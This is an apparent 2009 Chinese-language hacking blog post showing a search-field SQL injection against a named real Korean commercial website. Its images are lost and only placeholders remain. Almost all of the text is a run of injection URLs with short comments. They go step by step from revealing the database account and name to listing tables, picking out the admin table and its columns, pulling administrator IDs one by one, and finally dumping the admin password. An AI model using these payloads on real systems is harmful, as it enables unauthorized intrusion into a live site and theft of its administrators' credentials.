搜索型注入:一次简单的搜索型注入来源: 发布时间:星期六, 2009年9月12日 浏览:63次 评论:0
简单
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 然后再搜索 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 我这里看出有上面说 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and user>0 and '%'=' //得到当前数据库账号 http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and db_name ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select count(*) from admin)>0 and '%'=' //返回 ![]() ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0)>0 and '%'=' //得到当前数据库 ![]() ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange'))>0 and '%'=' //得到当前数据库 ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange','oldpo ![]() ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and%20(select%20top%201%20name%20from%20lvhuana3.dbo.sysobjects%20where%20xtype='u'%20and%20status>0%20and%20name%20not%20in('codechange','oldpo ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 其实分析可以知道只有这个tbl_admin表才是最重要 ![]() ![]() ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),1) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里 ![]() ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),2) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里 ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里 ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里 ![]() 列名暴完毕了 ![]() ![]() ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_employee_id from tbl_admin)>0 and '%'=' //得到第 ![]() ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 2 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第 2个管理员 ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 3 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第 3个管理员 ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第 4个管理员 ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第 5个管理员 ![]() http://www.lvhuana.co.kr/product/list_search.aspx?search=Donic%'and (select top 1 c_c_password from tbl_admin)>0 and '%'=' //这个语句是暴出管理员密码 ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() 标签: 搜索型注入 图片附件缩略图: ![]() ![]() ![]() 0
相关文章读者评论发表评论 |